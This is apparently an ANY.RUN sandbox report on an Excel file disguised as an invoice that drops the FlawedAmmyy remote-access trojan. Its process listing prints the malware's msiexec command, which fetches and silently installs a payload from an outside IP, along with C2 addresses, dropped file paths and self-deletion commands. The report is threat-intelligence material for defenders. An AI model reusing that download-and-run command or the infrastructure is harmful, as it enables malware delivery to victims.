analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

인보이스 18-02-2019.xls

Full analysis: https://app.any.run/tasks/fe71fc3a-2f53-4305-b005-01907d5c3f57
Verdict: Malicious activity
Threats:

FlawedAmmmyy is a RAT type malware that can be used to perform actions remotely on an infected PC. This malware is well known for being featured in especially large campaigns with wide target demographics.

Malware Trends Tracker     >>>
Analysis date: February 18, 2019, 23:40:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exe-to-msi
loader
rat
flawedammyy
ammyy
trojan
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Mon Feb 18 21:53:20 2019, Security: 0
MD5:

DF84893D492A78EA417ED9D185946B5D

SHA1:

065FEE06DA93ADFF3F0B64A307333816118E7688

SHA256:

14A577109DE5CBBD1A642C638850C42F5B0CC335D8A3572EC23228786BAC1D41

SSDEEP:

3072:9Kpb8rGYrMPelwhKmFV5xtezEsgrdgLiiiiiii3kZOeX7+93plBiFUq0oXGK:9Kpb8rGYrMPelwhKmFV5xtuEsgrdgLi4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 2988)

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2988)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2712)

    • Application was dropped or rewritten from another process

      • wsus.exe (PID: 3508)
      • wsus.exe (PID: 2616)

    • Downloads executable files from IP

      • msiexec.exe (PID: 2712)

    • Loads the Task Scheduler DLL interface

      • MSIF227.tmp (PID: 304)

    • Changes the autorun value in the registry

      • MSIF227.tmp (PID: 304)

    • FLAWEDAMMYY was detected

      • wsus.exe (PID: 3508)

    • Loads the Task Scheduler COM API

      • MSIF227.tmp (PID: 304)

    • Connects to CnC server

      • wsus.exe (PID: 3508)

  • SUSPICIOUS

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2712)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2712)
      • MSIF227.tmp (PID: 304)

    • Creates files in the program directory

      • MSIF227.tmp (PID: 304)

    • Creates files in the Windows directory

      • MSIF227.tmp (PID: 304)

    • Starts CMD.EXE for commands execution

      • MSIF227.tmp (PID: 304)

  • INFO

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2712)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2988)

    • Application was dropped or rewritten from another process

      • MSIF227.tmp (PID: 304)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 2712)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Microsoft Office
LastModifiedBy: 1
Software: Microsoft Excel
CreateDate: 2018:12:19 10:42:12
ModifyDate: 2019:02:18 21:53:20
Security: None
CodePage: Windows Cyrillic
Company: Microsoft Corporation
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Лист3
  • Макрос1
HeadingPairs:
  • Листы
  • 1
  • Макросы Excel 4.0
  • 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msif227.tmp #FLAWEDAMMYY wsus.exe cmd.exe no specs cmd.exe no specs wsus.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2988"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3592msiexec.exe val=conn rdp=redim OnLoad='c:\windows\cmd.exe' /i http://185.17.120.235/select /qC:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2712C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
304"C:\Windows\Installer\MSIF227.tmp"C:\Windows\Installer\MSIF227.tmp
msiexec.exe
User:
admin
Company:
IBM Controler' System Security Control
Integrity Level:
MEDIUM
Description:
IBM Controler' System Security Control
Exit code:
0
Version:
2.8.17228.1
3508"C:\ProgramData\Microsofts Help\wsus.exe"C:\ProgramData\Microsofts Help\wsus.exe
MSIF227.tmp
User:
admin
Company:
Microsoft Block Security
Integrity Level:
MEDIUM
Description:
Microsoft Block Security
Version:
1.18.2.51920
2708"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSIF227.tmp >> NULC:\Windows\system32\cmd.exeMSIF227.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2380"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSIF227.tmp >> NULC:\Windows\system32\cmd.exeMSIF227.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2616"C:\ProgramData\Microsofts Help\wsus.exe" C:\ProgramData\Microsofts Help\wsus.exetaskeng.exe
User:
admin
Company:
Microsoft Block Security
Integrity Level:
MEDIUM
Description:
Microsoft Block Security
Exit code:
0
Version:
1.18.2.51920
Total events
817
Read events
736
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
6
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
2988EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE591.tmp.cvr
MD5:
SHA256:
2712msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF7337BB2325EEA38C.TMP
MD5:
SHA256:
2712msiexec.exeC:\Config.Msi\20f051.rbs
MD5:
SHA256:
2712msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF9494A9014C38726F.TMP
MD5:
SHA256:
2712msiexec.exeC:\Users\admin\AppData\Local\Temp\Cookies\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
2712msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:424FD4BCB542B0E8FB8C760B0B253998
SHA256:B732FBC48B21EBE7D49B44149888AF15A64160D952C483B7C410731302F2911F
2712msiexec.exeC:\Windows\Installer\MSIEE0D.tmpexecutable
MD5:B5C26AEC13F40EF2976DB230A54C2DA5
SHA256:5A17C9FF6F6FE7C4FF38FF625531E3AD22E158E406517E039FB2995E5E073782
2712msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
304MSIF227.tmpC:\Windows\Tasks\Microsoft System Protect.jobbinary
MD5:926D7C2B9AB03F53B530F3640C35DC53
SHA256:39A3F1C1F426B3DD5F4DCD5A668F506E6A274B1C812F453DD574F06304E565CC
304MSIF227.tmpC:\ProgramData\Microsofts Help\wsus.exeexecutable
MD5:B24C094439AF3DA39612D5B4E1523A3D
SHA256:56B57FC829774AA4423B7A29FF5A081B75167D2466898ACBC7D89E717BFB4869
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2712
msiexec.exe
GET
200
185.17.120.235:80
http://185.17.120.235/select
RU
executable
168 Kb
suspicious
304
MSIF227.tmp
GET
200
185.17.120.235:80
http://185.17.120.235/dat3.omg
RU
binary
657 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
304
MSIF227.tmp
185.17.120.235:80
Leaseweb Deutschland GmbH
RU
suspicious
3508
wsus.exe
169.239.129.31:80
Zappie Host LLC
ZA
malicious
2712
msiexec.exe
185.17.120.235:80
Leaseweb Deutschland GmbH
RU
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
2712
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
2712
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3508
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT
3508
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] AMMYY RAT
3508
wsus.exe
A Network Trojan was detected
ET TROJAN Win32/FlawedAmmyy RAT CnC Checkin
3508
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT Checkin
1 ETPRO signatures available at the full report
Process
Message
MSIF227.tmp
C:\ProgramData\Microsofts Help\template_81e330.DATAHASH
MSIF227.tmp
--End Dowload--
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
인보이스 18-02-2019.xls